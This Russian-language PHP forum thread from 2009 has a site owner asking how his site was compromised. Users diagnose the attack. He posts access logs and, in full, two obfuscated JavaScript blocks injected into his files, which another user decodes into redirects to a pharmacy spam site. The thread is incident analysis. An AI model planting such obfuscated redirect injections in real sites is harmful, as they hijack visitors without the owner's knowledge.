ФорумПрограммированиеPHP для идиотов → Атаки на сайт.

Атаки на сайт.

  • Z-MODe

    Сообщения: ? Репутация: N Группа: Кто попало

    Spritz 23 июля 2009 г. 17:13

    Случилось первый раз, поэтому даже не знаю что и как думать.
    Есть сайт, сделанный на своей cms.

    В один прекрасный день в него залазит вирус..
    После чего получилось несколько отредактированных файлов, который так или иначе инклюдятся к indexу, в конце файлов был дописан код который выводит JS.. чё делает этот ЖС мне не понятно ибо это набор букв и цифр)

    Вопрос один, как это могло произойти? Это может быть моим косяком, т.е. моя цмс настолько убогая, что через неё получили доступ к файловой системе? Или всё таки фтп ломанули?
    нашёл вот такого подобия логи..

    205.209.142.43 - - [14/Jul/2009:16:21:43 +0400] "GET / HTTP/1.0" 200 8036 "-" "Java/1.6.0_13"
    205.209.142.43 - - [14/Jul/2009:16:21:56 +0400] "GET / HTTP/1.0" 200 2377 "-" "Java/1.6.0_13"
    205.209.142.43 - - [14/Jul/2009:16:21:57 +0400] "GET /en HTTP/1.0" 301 804 "-" "Java/1.6.0_13"
    205.209.142.43 - - [14/Jul/2009:16:21:58 +0400] "GET /about_us HTTP/1.0" 200 8036 "-" "Java/1.6.0_13"
    205.209.142.43 - - [14/Jul/2009:16:21:59 +0400] "GET /contacts HTTP/1.0" 200 7695 "-" "Java/1.6.0_13"
    205.209.142.43 - - [14/Jul/2009:16:21:59 +0400] "GET /dealer HTTP/1.0" 200 8063 "-" "Java/1.6.0_13"
    205.209.142.43 - - [14/Jul/2009:16:22:00 +0400] "GET /en/ HTTP/1.0" 200 7976 "-" "Java/1.6.0_13"
    205.209.142.43 - - [14/Jul/2009:16:22:00 +0400] "GET /index.html HTTP/1.0" 200 2377 "-" "Java/1.6.0_13"
    205.209.142.43 - - [14/Jul/2009:16:22:01 +0400] "GET /ru HTTP/1.0" 301 804 "-" "Java/1.6.0_13"
    205.209.142.43 - - [14/Jul/2009:16:22:01 +0400] "GET /eng HTTP/1.0" 302 - "-" "Java/1.6.0_13"
    205.209.142.43 - - [14/Jul/2009:16:22:01 +0400] "GET /eng HTTP/1.0" 302 - "-" "Java/1.6.0_13"



    http://z-mode.net.ru/went26.rar
    та папка в который лежат эти скрипты, после чего сайт в шоке.

  • md5

    Сообщения: 11951 Репутация: N Группа: в ухо

    Spritz 23 июля 2009 г. 22:30, спустя 5 часов 16 минут 17 секунд

    скорее фтп ломанули
    все умрут, а я изумруд
  • adw0rd

    Сообщения: 22902 Репутация: N Группа: в ухо

    Spritz 23 июля 2009 г. 23:48, спустя 1 час 18 минут 5 секунд

    Z-MODe, да, скорее всего фтп. Покажи js-код "последствий вируса".
    adw/0
  • Z-MODe

    Сообщения: ? Репутация: N Группа: Кто попало

    Spritz 24 июля 2009 г. 2:03, спустя 2 часа 15 минут 8 секунд

    <script language=javascript>document.write(unescape(&#39;%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E&#39;));dF(&#39;%297Glxqp%297I%294E%297Glieh%297I%294E%297Gwgvmtx%2964perkyeki%297H%2966NezeWgvmtx525%2966%2964x%7Dti%297H%2966xi%7Cx3nezewgvmtx%2966%297I%294Epsgexmsr2vitpegi%296%3C%2966lxxt%297E33%7B%7B%7B2pmgirwi1tlevqeg%7D2gsq%2966%296%3D%297F%294E%297G3wgvmtx%297I%294E%297G3lieh%297I%294E%297Gfsh%7D%297I%294E%297G3fsh%7D%297I%294E%297G3lxqp%297I4&#39;)</script>



    <script language=javascript>document.write(unescape(&#39;%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E&#39;));dF(&#39;*8Hmyrq*8J*5F*8Hmjfi*8J*5F*8Hxhwnuy*75qfslzflj*8I*77Of%7BfXhwnuy636*77*75y%7Euj*8I*77yj%7Dy4of%7Bfxhwnuy*77*8J*5Fqthfynts3wjuqfhj*7%3D*77myyu*8F44%7C%7C%7C3vzfqny%7Eiwzlxhqjfs3htr*77*7%3E*8G*5F*8H4xhwnuy*8J*5F*8H4mjfi*8J*5F*8Hgti%7E*8J*5F*8H4gti%7E*8J*5F*8H4myrq*8J5&#39;)</script>

  • krasun

    Сообщения: ? Репутация: N Группа: Джедаи

    Spritz 24 июля 2009 г. 2:37, спустя 33 минуты 59 секунд

    сделай так document.body.innerHTML = unescape(&#39;%3C%73%63%72%69%70%7…..); и покажи результат, так как это вполне понятные символы
  • krasun

    Сообщения: ? Репутация: N Группа: Джедаи

    Spritz 24 июля 2009 г. 2:46, спустя 9 минут 10 секунд

    твой скрипт создает функцию расшифровки, вот смотри

    function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t=&#39;&#39;;for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}

    которая расшифровывает строку и пишет ее

    dF(&#39;%297Glxqp%297I%294E%297Glieh%297I%294E%297Gwgvmtx%2964perkyeki%297H%2966NezeWgvmtx525%2966%2964x%7Dti%297H%2966xi%7Cx3nezewgvmtx%2966%297I%294Epsgexmsr2vitpegi%296%3C%2966lxxt%297E33%7B%7B%7B2pmgirwi1tlevqeg%7D2gsq%2966%296%3D%297F%294E%297G3wgvmtx%297I%294E%297G3lieh%297I%294E%297Gfsh%7D%297I%294E%297G3fsh%7D%297I%294E%297G3lxqp%297I4&#39;)



    после чего он спокойно вызывает записанный код

    и вот еще

    dF(&#39;*8Hmyrq*8J*5F*8Hmjfi*8J*5F*8Hxhwnuy*75qfslzflj*8I*77Of%7BfXhwnuy636*77*75y%7Euj*8I*77yj%7Dy4of%7Bfxhwnuy*77*8J*5Fqthfynts3wjuqfhj*7%3D*77myyu*8F44%7C%7C%7C3vzfqny%7Eiwzlxhqjfs3htr*77*7%3E*8G*5F*8H4xhwnuy*8J*5F*8H4mjfi*8J*5F*8Hgti%7E*8J*5F*8H4gti%7E*8J*5F*8H4myrq*8J5&#39;)

    {+++49+++} сейчас расшифрую, скажу что он делает, пару сек
  • adw0rd

    Сообщения: 22902 Репутация: N Группа: в ухо

    Spritz 24 июля 2009 г. 2:47, спустя 39 секунд


    сделай так document.body.innerHTML = unescape(&#39;%3C%73%63%72%69%70%7…..); и покажи результат, так как это вполне понятные символы


    http://pyha.ru/fishki/urlcoder/
    adw/0
  • krasun

    Сообщения: ? Репутация: N Группа: Джедаи

    Spritz 24 июля 2009 г. 2:56, спустя 9 минут 26 секунд

    вот первый код

    location.replace(&quot;http://www.license-pharmacy.com&quot;);


    второй делает аналогичное только с другим адресом {+++127+++} в итоге скрипт делает следующее, создает функцию расшифровки dF, которая в свою очередь то, что расшифрует пишет document.write(), а расшифровывает оно всего лишь функции перенаправления на другие страницы, вот и все. {+++238+++} такое обычно делают при XSS атаке, а возможно тебя и через FTP ломанули
  • Sinkler

    Сообщения: 9658 Репутация: N Группа: в ухо

    Spritz 24 июля 2009 г. 3:01, спустя 5 минут 6 секунд

    krasun, +1, не порекомендуешь к-н литературу про обеспечение безопасности веб-приложений?
  • krasun

    Сообщения: ? Репутация: N Группа: Джедаи

    Spritz 24 июля 2009 г. 3:05, спустя 4 минуты 2 секунды

    ой, по безопасности веб-приложений даже не знаю, не встречал такое наверное {+++18+++} в основном все в книгах урывками пишется
  • Troy

    Сообщения: 2533 Репутация: N Группа: Джедаи

    Spritz 24 июля 2009 г. 3:53, спустя 47 минут 28 секунд

    Sinkler, врят ли найдёш , про это я только статьи видел , просто данные фильтруй и будеш счастлив
  • krasun

    Сообщения: ? Репутация: N Группа: Джедаи

    Spritz 24 июля 2009 г. 3:54, спустя 48 секунд


    Sinkler, врят ли найдёш , про это я только статьи видел , просто данные фильтруй и будеш счастлив

    мне кажется тут все гораздо сложнее
  • Troy

    Сообщения: 2533 Репутация: N Группа: Джедаи

    Spritz 24 июля 2009 г. 4:11, спустя 17 минут 27 секунд

    krasun, я про SQL иньекции XSS
  • LIFF

    Сообщения: 188 Репутация: N Группа: Адекваты

    Spritz 24 июля 2009 г. 4:41, спустя 30 минут 16 секунд

    Sinkler, http://phpsec.org/projects/guide/ - думаю будет полезно почитать.
  • artoodetoo

    Сообщения: 5138 Репутация: N Группа: в ухо

    Spritz 24 июля 2009 г. 6:13, спустя 1 час 31 минуту 38 секунд

    планета вопасносте! бойтесь. придет чорный властелин и сделает инъекцию прямо в ваш иксэсэс.
    ιιlllιlllι унц-унц

Пожалуйста, авторизуйтесь, чтобы написать комментарий!